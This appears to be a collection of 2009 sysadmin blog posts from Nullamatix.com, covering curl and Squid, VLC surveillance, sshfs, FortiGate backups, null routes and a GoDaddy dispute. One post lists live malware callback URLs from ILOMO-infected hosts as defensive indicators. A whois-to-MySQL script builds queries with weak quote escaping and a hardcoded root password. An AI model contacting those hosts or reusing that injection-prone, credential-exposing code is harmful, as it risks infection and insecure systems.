See anon’s comment below.

http://twitter.com/str0ke/status/5422531377

***

I first heard the sad news from Michael on the Full-disclosure mailing list.

On Wed, Nov 4, 2009 at 9:19 AM, Micheal Turner wrote:
We are mourning a good friend today. I first begun talking to str0ke when I started publishing exploit codes onto this mailing list, he would always be polite and friendly in his emails. I got to know him over the years and am saddened by his departure, he contributed to the exploit scene and hacking subculture in a huge way. The last time I talked with him I asked him if I could interview him for my blog, he laughed and said he should be interviewing the exploit writers since he didnt do anything. That was str0ke and str0ke did alot, he always fought for the rights of the exploit developers and his website was the bread and butter of many a hackers day. He will sadly be missed by many people, hackers & friends.

At least now we can post exploits without that damn // milw0rm.com comment being added to the end!!! I joke, this code is dedicated to you str0ke. R.I.P my friend.

And eventually found an article from a blogspot blog with more details. Here’s BL4CK’s post:

Tuesday, November 3, 2009 - Str0ke @ Milworm’s Funeral is This Friday

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly….

I’ve just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

Always seems the good people are the first to go. May peace be with you and your family, str0ke. You’ll be missed…

More From Nullamatix.com:

• November 2, 2007 -- Fedora 7 VS. Debian Etch Business Card - You’ll Never Guess Who Wins
• January 24, 2008 -- Remote Denial of Service Exploit - Apple iPhone 1.1.2
• November 16, 2007 -- Bill O’Reilly’s “Culture Warrior” is a Joke on Amazon
• March 18, 2008 -- eBay is Leaving Commission Junction - Poor Mans BANS Updates Required

Post Originally Published at: Nullamatix.com - Technology Made Simple

An attempt to use sprunge.us (the only paste-bin worth using) with curl from behind a Squid proxy returns an error.

The Symptoms

Here’s the Squid error message in case you forgot:

ERROR

The requested URL could not be retrieved.

While trying to process the request:

POST / HTTP/1.1
User-Agent: curl/7.15.5 (i486-pc-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8c zlib/1.2.3 libidn/0.6.5
Host: sprunge.us
Accept: */*
Content-Length: 1117
Expect: 100-continue
Content-Type: multipart/form-data; boundary=----------------------------e77c50e200fb

The following error was encountered:

• Invalid Request

Some aspect of the HTTP Request is invalid. Possible problems:

• Missing or unknown request method
• Missing URL
• Missing HTTP Identifier (HTTP/1.0)
• Request is too large
• Content-Length missing for POST or PUT requests
• Illegal character in hostname; underscores are not allowed

Your cache administrator is: abc@123.local

Generated Sun, 25 Oct 2009 14:34:23 GMT by 123.local (squid)

And the entry in the Squid access logs:

1256481202.378      1 10.254.22.109 TCP_MISS/417 1623 POST http://sprunge.us/ - NONE/- text/html

The Fix

Force curl to use HTTP 1.0 instead of the default HTTP 1.1 by adding the “-0″ option.

~# iptables -L -n | curl -0 -F 'sprunge=<-' http://sprunge.us

Wait, what?

From the HTTP/1.1 RFC 2616:

Because of the presence of older implementations, the protocol allows ambiguous situations in which a client may send “Expect: 100-continue” without receiving either a 417 (Expectation Failed) status or a 100 (Continue) status. Therefore, when a client sends this header field to an origin server (possibly via a proxy) from which it has never seen a 100 (Continue) status, the client SHOULD NOT wait for an indefinite period before sending the request body.

Basically, Squid is HTTP 1.0, and “Expect: 100-continue” in the header is HTTP 1.1, so Squid throws an error. If curl is instructed to use HTTP 1.0, Squid is happy and the request is processed successfully.

More From Nullamatix.com:

• December 13, 2007 -- Q: Is The Lack Of Sound Quality Worth The Risk?
• January 2, 2008 -- How To Get Included In The Google Index In 48 Hours Or Less
• July 25, 2007 -- MediaWiki 1.10 Sendmail Error: Unexpected Response to RCPT TO
• October 15, 2007 -- How To: GnuPG (gpg4win) for MS Office Outlook, Exchange, and Others

Post Originally Published at: Nullamatix.com - Technology Made Simple

Rather than forking over $500 on some lame ass pre-packaged kit, I’ve implemented a semi-automated, fairly reliable, secure, and cost effective home surveillance system using some good old fashion: Debian, cron, bash/sh, ssh, VLC, and a couple IP cameras obtained from w00t.com a few years back. Let’s run this…

Install VLC

[bigbrother ~]:# aptitude -y install vlc

Create a Script

Here’s a version of the script I’m using:

[bigbrother ~/bin]:$ cat ipcam
#!/bin/sh
export DISPLAY=:0.0
dom=`date -u +%d`
streamit="http://10.254.1.114/cgi-bin/getimage.cgi?motion=1"
vlc -I dummy "$streamit" --sout "#transcode{vcodec=mp1v,vb=124,scale=1,width=320,height=240,fps=25}:duplicate{dst=std{access=file,mux=ts,dst=-}}" | split -b 536870912 -d - /mnt/sshfs/ny-dc/the-lab/vid-$dom.mpg >/dev/null 2>&1
 
[bigbrother ~/bin]:$

MJPEG

“streamit” is the raw MJPEG feed from the IP cam. The URL above works for an NCL-1000 model IP camera, great for those of us opposed to installing the bs ActiveX. To see the raw camera feed, simply create an HTML file with an image tag, like so:

<img src="http://10.254.1.114/cgi-bin/getimage.cgi?motion=1" />

Ta-da, no ActiveX, just a raw feed.

Break it Down

The script above does the following: exports the ‘dummy’ display, sets “dom” variable to the current day in numeric form, sets the location of the MJPEG stream, executes VLC in “dummy” mode, dumps stdout to /dev/null, outputs/transcodes the IP cam MJPEG stream as MPEG1 with a resolution of 320×240 @ 25 frames per second. The transcoded version is then dumped in 512 megabyte increments to an SSH file system (sshfs) mount (/mnt/sshfs/ny-dc/the-lab/) so the recorded video is stored several hundred miles away from home (what good is a camera recording to a hard-drive if they steal the computer??). The result is a series of 512 MB files neatly organized in a format like so:

vid-22.mpg00
vid-22.mpg01
vid-22.mpg02
vid-22.mpg03
etc..

Conclusion

Setup a cron job to auto-rotate the script however you like. 7am - 7pm Monday through Friday? No problem. What about just the weekends? Crontab is your friend. The best part of all this is the COST, or lack of. Hard drives and “cloud” computing are both dirt cheap compared to a decade ago, and VLC is of course free.

Unless the crook is smart enough to cut Inet access (wired), knock out my generous (naive?) neighbor’s open-wifi, kill the electricity to the house, and then patient enough to wait for the UPS to die, I’d say there’s an excellent chance he or she will end up on camera. SAY CHEESE.

More From Nullamatix.com:

• January 21, 2008 -- Linux Requires Windows - No, Seriously
• May 26, 2009 -- 2HOST $5 512MB Ram Xen VPS (LowEndBox)
• November 5, 2007 -- Google Says: “We’re not making gPhone.”
• December 10, 2007 -- Are You Feeling Sorry For Someone? Don’t

Post Originally Published at: Nullamatix.com - Technology Made Simple

At first, 3 domain transfer requests were all denied, almost immediately. Here’s the standard email template they send to the Administrative Contact address:

Dear Bill McGoo,

The transfer of SOME-OR-ANY-DOMAIN.COM from GoDaddy.com, Inc. to another registrar could not be completed for the following reason(s):

Express written objection to the transfer from the Transfer Contact. (e.g. - email, fax, paper document or other processes by which the Transfer Contact has expressly and voluntarily objected through opt-in means).

The express written objection may be the result of a pending or recently completed Change of Registered Name Holder. This is an opt-in process during which the new Registered Name Holder agrees not to transfer for 60-days. This domain will be transferrable [SIC] on 12/18/2009.

If you believe that this domain name does not fit the situation described above, go to http://www.godaddy.com/gdshop/support.asp?prog_id=GoDaddy&isc=gdbb95 for assistance.

Regards,
Domain Services
GoDaddy.com, Inc.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Copyright 2009 GoDaddy.com, Inc.. All rights reserved.

Right out of the shoot, “transferrable” is misspelled, and the link they provide leads to their index rather than a dispute form, assistance form, or anything relevant to the email. So much for “assistance.” After a bit of research, I discovered this basically means,

A portion of the whois information for the domain has changed in the last 60 days and you voluntarily agreed to avoid transferring the domain until after 60 days has passed.

Ok, I’ll play your stupid game. I did voluntarily agree to this idiotic voluntary “opt-in” process, so what? Now, I voluntarily disagree and wish to “opt-out.”

A phone call to their 24 hour support line was less than assuring. The first guy Thomas or Timothy informed me there was nothing he or I could do to reverse the 60 day hold on my domains. Ok, “put your supervisor on the line.” After 30+ minutes of some hold action, DeeAnna was kind enough to take my call. She too initially claimed there was nothing she or I could do to remove the hold, and made sure to emphasize the process was voluntary.

Pardon me, but not only is this GoDaddy “process” against ICANN policy, facing additional charges/penalties or even domain suspension/removal due to erroneous Whois information hardly makes the process voluntary, DeeAnna. After citing the ICANN registrar policy and an announcement addressing this exact “process”, DeeAnna eventually said she or someone at GoDaddy could address my issue on Tuesday, the following week. “Just send me an email with the details.” she said.

Here’s the email I sent a couple hours after our discussion:

DeeAnna:

     We spoke briefly this morning about the rejection notice I received when attempting to transfer a few domains to another registrar. Before going into the details, I’d first like to thank you for taking the time to assist me with this incident. Your willingness to address the issue restored some of the confidence I’ve recently lost in GoDaddy. An acceptable resolution in a reasonable amount of time will ensure GoDaddy retains a customer that will continue to expand for many years; however, after today’s blatant disregard for such a simple request, I’m questioning whether or not GoDaddy is a company I’m willing to grow with. In an effort to maintain an on-going positive business relationship, I’m respectfully requesting GoDaddy adhere to and comply with the ICANN,

     “Policy on Transfer of Registrations between Registrars Revision Adopted 7 November 2008 Effective 15 March 2009. [1]”

     In addition, please consider reviewing the ICANN advisory released April 3rd, 2008, entitled,

     “Registrar Advisory Concerning the Inter-Registrar Transfer Policy [2]”

     which clearly states in English,

     “A registrant change to Whois information is not a valid basis for denying a transfer request.”

     GoDaddy has never received a written objection to transfers for 60 days after whois information is updated/modified in the form of an email, fax, paper, or voluntary opt-in from me. A check box without the ability to “opt-out” is not a form of voluntary “opt-in” if one is unable to also voluntarily “opt-out.” If that check box is GoDaddys attempt at making a “voluntarily” “opt-in” process available to customers, consider this email a voluntary official written request to opt-out of the GoDaddy “opt-in” process which denies transfer requests from external registrars seeking any and all the domains associated with my GoDaddy account (#XX98XXXX) due to whois modifications which might have taken place within the last sixty days.

     Again, just to be clear. Unless one or more of the nine legitimate specific instances cited in the ICANN “Policy on Transfer of Registrations” is applicable to the transfer, I’m voluntarily opting-out of the voluntary opt-in GoDaddy Whois Record Modification 60-day Transfer Lock Process, and respectfully request GoDaddy allow the release of any and all domain names associated with my account, seeking or awaiting transfer to an external registrar that posses a valid “Authorization” or “EPP” code for the transfer. Despite how crooked this whole ordeal has been, I’ve held off filing any type of complaint or dispute with the BBB or ICANN in the hopes that you guys will just do the right thing.

     The account isn’t hacked; I’m the administrative contact, hostmaster, and technical contact on all of the domains associated with my GoDaddy account (#XX98XXXX). I have the credentials to the “Domains by Proxy” account, all the payment information, whatever you guys need to make this happen. What more do you want from me? I’ve called your support line a grand total of 2 times since registering my first domain years ago. It’s not like I’m some trouble maker that’s calling everyday to have my password reset or to haggle over prices. GoDaddy has been great, but this whole experience has really given me a new and extremely disappointing perspective…

     So, DeeAnna. Can I trust you’ll send this to the right people? I’m not looking for a fight, just seeking the same amount of courtesy and respect everyone deserves. I’ve always paid my dues, even made recommendations to people every opportunity possible. GoDaddy is the leader when it comes to domain names; to see a “leader” keep something legitimately obtained by someone else is pretty ‘Kim Jung Il’ like.

Again, thank you for your time, and peace be with you.

Regards,

-Guy P
Mobile: 555.555.5555 (24×7)
Mobile: 555.555.5555 (24×7)
Land: 555.555.5555 (EST:8-5,M-F)
——————————————
1. http://www.icann.org/en/transfers/policy-en.htm
2. http://www.icann.org/en/announcements/advisory-03apr08.htm

Shortly after sending that email, I initiated the transfer process for a second attempt. Eventually, all 3 of the previously denied domains were successfully transfered. DeeAnna replied 3 days later after the majority of my domains were in the process of transferring. I still wonder why GoDaddy suddenly, and without any explanation, decided to release the domains for the second transfer request. Perhaps they know their shady tactic is unethical and they lack the balls integrity to admit when they’re wrong.

Still not convinced? Here are some additional GoDaddy horror stories:

• NoDaddy.com Horror Stories
• Inaccurate Email Address? rm -rf your-domains.com
• GoDaddy: Cyber Squatting 101
• GoDaddy Permits Trackback Spamming
• Why I Don’t Owe GoDaddy $6,579.51 (or $969) - Part 2 (The Refund)
• Domains By Proxy is a Waste of Money
• NoDaddy.com Forums - GoDaddy Horror Stories
• Wikipedia: GoDaddy Controversies

At the time of writing, 92,000 results for: GoDaddy Sucks. So, since you’re still reading this, care to share your GoDaddy story, good or bad? Use the comment submission form below.

More From Nullamatix.com:

• March 18, 2008 -- eBay is Leaving Commission Junction - Poor Mans BANS Updates Required
• February 29, 2008 -- SftpDrive: A Must Have Utility For Web Designers
• November 15, 2007 -- Leaked: Standard Operating Procedures for Camp Delta
• December 4, 2007 -- This Blog’s SEO Score is Better than Shoemoney’s

Post Originally Published at: Nullamatix.com - Technology Made Simple

guyp@q9550 ~$ sshfs -p 62002 root@10.254.7.56:/ /mnt/sshfs
fuse: failed to open /dev/fuse: Permission denied

Ok, what happens if we prefix with sudo?

guyp@q9550 ~$ sudo sshfs -p 62002 root@10.254.7.56:/ /mnt/sshfs
guyp@q9550 ~$ ls -lah /mnt/sshfs
ls: cannot access /mnt/sshfs: Permission denied

Well dammit, now what? Forget sudo and go back to the issue. Let’s see what the permissions on /dev/fuse look like…

guyp@q9550 ~$ ls -lah /dev/fuse
crw-rw---- 1 root fuse 10, 229 2009-10-17 01:57 /dev/fuse

According to that, members of the “fuse” group can read and write to /dev/fuse; excellent, so here’s how to fix the issue once and for all:

guyp@q9550 ~$ sudo usermod -a -G fuse guyp
guyp@q9550 ~$ groups
guyp root adm wheel audio operator fuse
guyp@q9550 ~$ sshfs -p 62002 root@10.254.7.56:/ /mnt/sshfs
guyp@q9550 ~$ cat /mnt/sshfs/etc/debian_version
5.0.3
guyp@q9550 ~$

Congratulations, you’re transferring files securely. Use sshfs to map remote drives for music, movies, remote backups, off-site surveillance recordings, whatever your heart desires.

See Also:

• August 22, 2009 -- Howto: Fortinet Pub Key Authentication for Backups

Post Originally Published at: Nullamatix.com - Technology Made Simple

Hello,

I am replying to your post on http://www.blogstorm.co.uk/how-to-scrape-pages-with-coldfusion/

Wanted to see your experience in page scraping, may need your help on a project. HOw much did you do beyond the above Code?

Thanks

That guest post was written over a year ago and I haven’t written anything in Coldfusion for quite some time. After responding with this information, he replied with,

Hello Guy,

Thanks for the info. We don’t need something fast and efficient, since Bash or perl is faster probably. Just something I can maintain. Do you have a script that can extract the WHois info?

Thanks

So I put together a little sh/bash script that will read a list of domain names from a text file, whois each domain, and insert the results into a MySQL table. Here’s the finished (tested/working) script:

#!/bin/sh
WHOISME="/tmp/list-of-domains-to-whois.tmp"
# mysql username
SQLUSER="root"
# mysql password
SQLPASS="h0h0h0"
# mysql server hostname/IP
SQLHOST="mysql-server.localdomain"
# prints date in YYYY-MM-DD format
SQLDATE=$(date +%F)
# database to use (created with: mysql> create database db_whois;)
SQLDB="db_whois"
# table inside the database to use
# created with: mysql> CREATE TABLE tbl_scraped(id INT NOT NULL AUTO_INCREMENT,PRIMARY KEY(id),domain VARCHAR(50),whois_data TEXT,date DATE);
SQLTBL="tbl_scraped"
# mysql> describe tbl_scraped;
# +------------+-------------+------+-----+---------+----------------+
# | Field      | Type        | Null | Key | Default | Extra          |
# +------------+-------------+------+-----+---------+----------------+
# | id         | int(11)     | NO   | PRI | NULL    | auto_increment | 
# | domain     | varchar(50) | YES  |     | NULL    |                | 
# | whois_data | text        | YES  |     | NULL    |                | 
# | date       | date        | YES  |     | NULL    |                | 
# +------------+-------------+------+-----+---------+----------------+
# 4 rows in set (0.00 sec)
 
# the magic
cat $WHOISME |while true
do read LINE || break
WHOISD=$(whois $LINE |sed "s/'/\\\'/")
echo "INSERT INTO $SQLTBL VALUES (NULL,'$LINE','${WHOISD}','${SQLDATE}');"\
|mysql -u$SQLUSER -p$SQLPASS -h$SQLHOST $SQLDB
done; echo "Job Done - Exiting..."
exit 0

Enjoy…

See Also:

• July 31, 2009 -- Howto: Lock Your Screen in dwm with WindowsKey+L
• August 14, 2009 -- Howto: Tail Lighttpd Logs with Style using Sed

Post Originally Published at: Nullamatix.com - Technology Made Simple

On Sun, Aug 30, 2009 at 12:36 AM, Peter Ferrie wrote:

You are extrapolating, based on an incorrect assumption - that blacklists will exist forever. When the number of bad files exceeds the number of good files, then whitelists will reign instead.

Epic.

Link to Thread

See Also:

• August 14, 2009 -- Howto: Tail Lighttpd Logs with Style using Sed

Post Originally Published at: Nullamatix.com - Technology Made Simple

First, ssh to the device and enable SCP functionality:

[user@l00nix ~]$ ssh admin@192.168.1.99
Password:
 
Fortigate-5001 # config system global 
 
Fortigate-5001 (global) # set admin-scp enable
 
Fortigate-5001 (global) # end
 
Fortigate-5001 # exit
Connection to 192.168.1.99 closed.
[user@l00nix ~]$

In order to automate the process for our Linux backup server the FortiGate will need to have the backup account’s public key. After creating the “forticonfs” or whatever account on the backup server, creating a public/private keypair for the backup account (ssh-keygen -t rsa), log back into the FortiGate and issue the following commands:

[user@l00nix ~]$ ssh admin@192.168.1.99
Password:
 
Fortigate-5001 # config system admin
 
Fortigate-5001 (admin) # edit admin
 
Fortigate-5001 (admin) # set ssh-public-key1 "ssh-rsa ... forticonfs@backups.domain.com"
 
Fortigate-5001 (admin) # next
 
Fortigate-5001 (admin) # end
 
Fortigate-5001 # exit
Connection to 192.168.1.99 closed.
[user@l00nix ~]$

You’ll need to replace the public key data with your own:

[root@backups001 ~]# cat /home/forticonfs/.ssh/id_rsa.pub
ssh-rsa BBB...yf3w== forticonfs@backups.domain.com
[root@backups001 ~]#

Now, perform a simple test to ensure everything’s setup correctly:

[forticonfs@backups001 ~]$ mkdir forti-confs
[forticonfs@backups001 ~]$ scp admin@192.168.1.99:sys_config ~/forti-confs/5001.conf
 
sys_config                 100%  258KB 257.5KB/s   00:00
 
[forticonfs@backups001 ~]$ ls -lah ./forti-confs
-rw------- 1 forticonfs forticonfs 258K Aug 22 14:51 5001.conf
[forticonfs@backups001 ~]$

From here, the entire process can be stream lines via a cron-job. With a bash script, one could enumerate through a list of devices with a simple for loop. Run the job every night at mid-night and you’ve got a completely automated method for backing up your configs. Should anything go wrong with a device for any reason (hardware failure, screwed up config setting, whatever), restore the config from the nightly backups archive and you’re a damn hero.

Anyone else have any interesting FortiGate tricks or tips they’d like to share? Send me an email or post a comment.

See Also:

• May 11, 2009 -- Chaos in The Enterprise - RIP Poisoning 101
• October 17, 2009 -- Solution: “failed to open /dev/fuse: Permission denied”
• May 13, 2009 -- IPTables Drop Log For 05.12.09

Post Originally Published at: Nullamatix.com - Technology Made Simple

[root@nullamatix ~]# route add -net 124.151.0.0/16 reject
[root@nullamatix ~]#

Problem solved. But what about null routes in Windows XP or Server 2003 setups?

First of all, consider putting your Windows server behind a hardware firewall. If for some reason that’s not an option, or you perhaps you want to send outgoing requests down another path, try this.

C:\> route ADD 124.151.99.22 MASK 255.255.255.255 192.168.1.253
C:\>

Where 192.168.1.253 is an unused/unclaimed IP in the Windows subnet.

The following example is from Wikipedia:

C:\> route ADD 192.168.32.128 MASK 255.255.255.255 192.168.32.254
C:\>

That’s a nifty hack for a single host, but what about an entire class B? Let’s try:

C:\> route ADD 122.160.0.0 MASK 255.255.0.0 10.10.254.253
C:\>

And the route print command should show an entry similar to:

C:\> route print
... normal routing table...
============================
Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
      122.160.0.0      255.255.0.0     10.10.254.253       1
C:\>

Now, a trace route to any address in that class B should fail, assuming 10.10.254.253 is not a gateway.

C:\Users\root>tracert 122.160.23.248
 
Tracing route to ABTS-North-Static-248.23.160.122.airtelbroadband.in [122.160.23.248]
over a maximum of 30 hops:
 
  1     *        *        *     Request timed out.
  2     *        *        *     Request timed out.
  3     *        *        *     Request timed out.
  4     *        *        *     Request timed out.
  5     *        *        *     Request timed out.
  6     *        *        *     Request timed out.
  7 ... ....

Beautiful; mission accomplished. This isn’t exactly a “null route” but definitely a hack/work-around worth mentioning. Any other Windows or Linux network/security related tips you’d like to read about? Share your suggestion(s) in a comment.

[key-phrase] Windows XP Null Route

See Also:

• May 11, 2009 -- Chaos in The Enterprise - RIP Poisoning 101

Post Originally Published at: Nullamatix.com - Technology Made Simple

Teh Scr1pt

Create a new file to put the l33t code into:

rewt@bawnx ~# vim /usr/local/bin/httptail

Add this mess:

#!/bin/sh
GREENY=`echo -en '\e[32m'`
YELLOW=`echo -en '\e[93m'`
RESET=`echo -en '\e[00m'`
tail -f httpd_access.log |sed -e "s/^.*\]: //g;s/ www.somedomain.*\] \"/ \"/g;s/ HTTP\/.* \"/\" /g;s/\([0-9]*\.[0-9]*\.[0-9]*\.[0-9]*\)/$GREENY\1$RESET/g;s/\(\"[^\"]*\"\)/$YELLOW\1$RESET/g"

Stuff You Need to Change:

• The access log filename
• www.somedomain - if you’re not sure what goes here …

Now, save the file and make it executable.

rewt@bawnx ~# chmod +x /usr/local/bin/httptail

Run it and enjoy the show:

rewt@bawnx ~# httptail
...........

See Also:

• August 31, 2009 -- Howto: Insert Bash Command Output Into MySQL
• August 30, 2009 -- Whitelists Will Reign
• July 31, 2009 -- Howto: Lock Your Screen in dwm with WindowsKey+L

Post Originally Published at: Nullamatix.com - Technology Made Simple

The traditional Windows XP/2003 method of locking your workstation is pretty slick, just press WindowKey+L and you’re good to go. But how do we bring that functionality to DWM? Easy…

Open your config.h:

q9550:/home/sysop/.dwm/dwm-5.6.1# vi config.h

Find this section:

/* key definitions */
#define MODKEY Mod1Mask
#define TAGKEYS(KEY,TAG) \
{ MODKEY,                       KEY,      view,           {.ui = 1 << TAG} }, \
{ MODKEY|ControlMask,           KEY,      toggleview,     {.ui = 1 << TAG} }, \
{ MODKEY|ShiftMask,             KEY,      tag,            {.ui = 1 << TAG} }, \
{ MODKEY|ControlMask|ShiftMask, KEY,      toggletag,      {.ui = 1 << TAG} },

Modify to look like this:

/* key definitions */
#define MODKEY Mod1Mask
#define WINKEY Mod4Mask
#define TAGKEYS(KEY,TAG) \
{ MODKEY,                       KEY,      view,           {.ui = 1 << TAG} }, \
{ WINKEY,                       KEY,      view,           {.ui = 1 << TAG} }, \
{ MODKEY|ControlMask,           KEY,      toggleview,     {.ui = 1 << TAG} }, \
{ MODKEY|ShiftMask,             KEY,      tag,            {.ui = 1 << TAG} }, \
{ MODKEY|ControlMask|ShiftMask, KEY,      toggletag,      {.ui = 1 << TAG} },

Next, find the commands section, and append:

static const char *slock[]    = { "slock", NULL };

Then make your way to the keys section and make it look like this:

static Key keys[] = {
/* modifier                     key        function        argument */
{ MODKEY,                       XK_p,      spawn,          {.v = dmenucmd } },
{ MODKEY|ShiftMask,             XK_Return, spawn,          {.v = termcmd } },
{ WINKEY,                       XK_l,      spawn,          {.v = slock } },
{ MODKEY,                       XK_b,      togglebar,      {0} },
etc...

Save your changes and quit, then recompile dwm.

q9550:/home/sysop/.dwm/dwm-5.6.1# make clean install

Now, if you haven’t already, download, extract, and install slock:
http://tools.suckless.org/slock

Finally, ModKey + Shift + Q to shut down dwm gracefully, then startx to fire it back up. Try locking your screen by pressing WindowKey (Mod4) + L. If the screen goes black, you’re good to go. If not, you did something wrong, or my directions suck. Either way, let me know and we’ll figure it out..

See Also:

• August 31, 2009 -- Howto: Insert Bash Command Output Into MySQL
• August 14, 2009 -- Howto: Tail Lighttpd Logs with Style using Sed

Post Originally Published at: Nullamatix.com - Technology Made Simple

Just to give you an idea of how vicious this thing is, check out some of the http requests coming from infected machines:

Timestamp:		Client IP:		Malicious Request:
07-16 15:38:28		192.168.70.211		78.109.30.213/Os93kfbJHks81Ldna
07-16 15:38:54		192.168.70.199		87.118.88.30/RslNs0LkdngUskd8
07-16 15:37:26		192.168.70.213		66.199.237.3/9skLsoPfJls4Kks1
07-16 15:37:26		192.168.70.215		67.15.150.130/xMZPaKdPB2jxLVEz
07-16 15:35:42		192.168.70.220		66.225.237.140/0AlndjA0dj1lllqq
07-16 15:35:18		192.168.70.197		78.109.31.54/290mkkkKadheOas0
07-16 15:42:31		192.168.70.215		67.15.150.130/xMZPaKdPB2jxLVEz
07-16 15:42:28		192.168.70.213		66.199.237.3/9skLsoPfJls4Kks1
07-16 15:44:08		192.168.70.199		87.118.88.30/RslNs0LkdngUskd8
07-16 15:43:31		192.168.70.211		78.109.30.213/Os93kfbJHks81Ldna

Attempting to visit one of those URLs returns a 404, allegedly served up by nginx/0.6.32. But the headers say otherwise…

[nullamatix ~]:# curl -I 66.225.237.140/0AlndjA0dj1lllqq
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 17 Jul 2009 12:28:17 GMT
Server: lighttpd/1.4.18

Lighttpd 1.4.18 on that one…

[nullamatix ~]:# curl -I 66.199.237.3/9skLsoPfJls4Kks1
HTTP/1.1 404 Not Found
Server: nginx/0.6.35
Date: Fri, 17 Jul 2009 12:29:53 GMT
Content-Type: text/html
Connection: close
Content-Length: 169

nginx/0.6.35 here.

I’ve also seen Apache returned in the headers, despite the 404 page saying nginx.

Keep your eyes peeled folks, this one is a monster. For more information and updates, point your favorite browser to: http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=CRYP_ILOMO-2

I’ll try and provide any updates as they happen…

See Also:

• May 13, 2009 -- IPTables Drop Log For 05.12.09

Post Originally Published at: Nullamatix.com - Technology Made Simple

If anyone would like to know what I did, just post a comment…

*******************
First of all: No I don’t, and why the hell is the Google Chat box telling me what I need to do? Who thought reversing the roles of software was a good idea? Computers exist for the sole purpose of listening for and obeying user instructions. Since reddit is a hopeless pit of Ubuntu ass kissing dolts, perhaps this post will warrant a sane discussion. Anyway, here’s what happened…

Earlier today I decided to check out an old AIM account I once had, but quickly learned I either forgot the password, or the account just no longer exists. Whatever, that’s not the important part…

After giving up on the AIM account, GMail (the chat portion, specifically) insists on telling me what I need to do. Here’s the issue: I’m unable to figure out how to tell GChat+AIM to go fuck itself.

So, here are my options:

• Continue to let Gchat tell me what I need to do
• Stop using GMail (It’s so tempting right now…)
• Create an AIM account
• ???

Anyone have any solutions/suggestions to resolve this annoyance? This is such a simple issue, but for reasons unknown to me, the GMail crew thinks this is ok.

More From Nullamatix.com:

• December 12, 2007 -- Nullamatix.com Survived The Digg Effect, Barely
• January 15, 2008 -- Paid Links are Alive and Well
• December 15, 2007 -- The iCache Might Replace Your Credit Cards
• November 2, 2007 -- Fedora 7 VS. Debian Etch Business Card - You’ll Never Guess Who Wins

Post Originally Published at: Nullamatix.com - Technology Made Simple

• 512MB Ram / 1024MB Swap (More available)
• 1 IP Address (Upgrade to 2 for another $5/mo)
• 300GB Bandwidth per Month
• Monthly or Yearly Payments Available
• Xen Node with CentOS 5 & Debian 5 Available
• “Dedicated, guaranteed, non-overbooked resources”
• “100% gigabit powered screaming fast network”

Updates: [ 1 ] , [ 2 ] , [ 3 ]

They also say,

Our servers are all the latest dual socket, dual QuadCore Intel Xeon’s with at least 32GB Fully-Buffered RAM, high performance 6x 450GB SAS 15,000RPM RAID10 storage. Utilizing SAS drives with 15,000RPM means better performance, long life and servergrade hard drives, ideal for virtualization

Ok, sounds great, right? So far, yes, until you attempt reading their non existent Acceptable Use Policy, Terms of Service, Service Level Agreement, or Privacy Policy, all of which return a 404 at the time of writing.

bigbrother ~:# curl -I http://www.2host.com/tos.html
HTTP/1.0 404 Not Found
Date: Tue, 26 May 2009 03:13:30 GMT
Server: Apache/2
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from 0x95.net
Connection: close
 
bigbrother ~:# curl -I http://www.2host.com/aup.pdf
HTTP/1.0 404 Not Found
Date: Tue, 26 May 2009 03:13:38 GMT
Server: Apache/2
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from 0x95.net
Connection: close
 
bigbrother ~:# curl -I http://www.2host.com/sla.pdf
HTTP/1.0 404 Not Found
Date: Tue, 26 May 2009 03:13:43 GMT
Server: Apache/2
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from 0x95.net
Connection: close
 
bigbrother ~:# curl -I http://www.2host.com/pp.pdf
HTTP/1.0 404 Not Found
Date: Tue, 26 May 2009 03:13:50 GMT
Server: Apache/2
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from 0x95.net
Connection: close

How can a company that claims,

“a team of professionals with years of industry experience, focusing on US-based virtualized and dedicated server solutions. The company is driven by reliability, customer satisfaction and value for money”

even be considered when their “Legal Documents” are non existent? Anyway, I used their contact form to send them this,

Good Morning,

After seeing the incredible $5/mo ($60/yr) VPS offer, I was eager to sign up for a year, but like any good consumer, I first decided to check out the TOS, AUP, SLA, an PP, all of which 404′d.

http://www.2host.com/tos.html
http://www.2host.com/aup.pdf
http://www.2host.com/sla.pdf
http://www.2host.com/pp.pdf

Can you please provide these documents?

Also, is the $5/mo good for the lifetime of the VPS? If I purchase for a year, and then renew after that year, will the price remain $5/mo ($60/yr)?

Thanks,

Guy Patterson
http://www.nullamatix.com/

I’ll be sure to provide an update when and if they respond…

(Quick!) Update - 05/26/09 @ 07:45:00

Wow, within an hour of submitting my question, a member of 2HOST’s staff responded with this,

Hello,

The prices are for the life of the account and will not increase in the future (for the services that you have ordered).

We reserve the right to change prices for non-ordered products or services. If you have a 1GB VPS and we increased the prices for our 1GB and 1.5GB plans, your price will stay the same, unless you wish to upgrade to 1.5GB.

As for the Legal documents, I will look into this further.

Best regards,

John Danielsen

———————————————-
Ticket ID: #101XXX
Subject: Contact Form: WHT Offer
Status: Answered
Ticket URL: http://www.2host.com/support/viewticket.php?tid=xxxxxx&c=xxxxxxx
———————————————-

I may be signing up for one of these after all. Just standing by for the legal docs at this point…

Update - 05/27/09 @ 07:10:00

Still no word on the status of 2HOST.com’s “legal documents.” Such a shame, the price is amazing. I probably wouldn’t have a problem with any of their legal documents, but it’s just nice to know what you’re getting into before making any type of commitment. How is it possible to not have these documents available after five+ years of service? Incredible… Scam/Hoax?

Update - 05/29/09 @ 08:03:00

Looks like 2HOST’s legal docs are finally available. After reading over the SLA, I couldn’t help but notice the reference to “2HOS” instead of “2HOST.” Minor issue, just struck me as odd..

“Hello,

The Legal Documents page has been updated. If it’s still not working for you, please try clearing the browser cache. We appreciate your patience. Do let me know if you have any further questions.

Best regards,
John Danielsen“

After looking over their AUP, SLA, TOS, and PP, a server for $60/yr sounds pretty reasonable :]

More From Nullamatix.com:

